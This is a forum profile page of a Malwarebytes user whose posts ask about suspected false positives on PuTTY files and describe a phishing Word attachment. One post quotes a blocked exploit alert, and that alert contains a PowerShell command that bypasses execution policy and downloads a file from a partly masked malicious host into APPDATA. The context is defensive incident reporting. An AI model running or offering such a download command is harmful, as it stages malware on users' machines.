Jump to content

SCL

Members
  • Content Count

    6
  • Joined

  • Last visited

Community Reputation

0 Neutral

About SCL

  • Rank
    New Member
  1. OK thanks for confirming guys. Where are the scan logs saved?
  2. After further investigation, I see it was not Active Protection but it was a Quick Scan.
  3. MBAM Active Protection has identified putty related files as locky on several machines on my network. The files have been quarantined and I am hestitent to unquarantine. File names are C:\Program Files\Putty\plink.exe, C:\Windows\Installer\66785c8.msi and C:\Users\*USERNAME*\downloads\putty-64bit-0.68-installer.msi. Is there a log somewhere that I can attach? Or what else needs to be done. Need to verify that this was indeed a false positive.
  4. Thanks Pedro. I have to say- no amount of user training is going to beat this. It was shockingly good. Going to have to continue improving protections. If this becomes the norm, its a whole new ball game. Absolutely none of the typical signs of it being false.
  5. We have gotten AE alerts before. Usually harmless. However this morning multiple malicious emails came into the organization, all from same sending, and 2 users opened the attachment (word doc). I received alert below: 8/31/2017 7:00:09 AM Computer18 10.10.1.125 Exploit payload process blocked BLOCK C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile('http:\*******************.com\okas\kunkd.dat', $env:APPDATA
  6. Looks like I might have a false positive. On MBAM for business and seeing this file quarantined widely. Not sure how to grab the log on business version... idapinst.zip
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.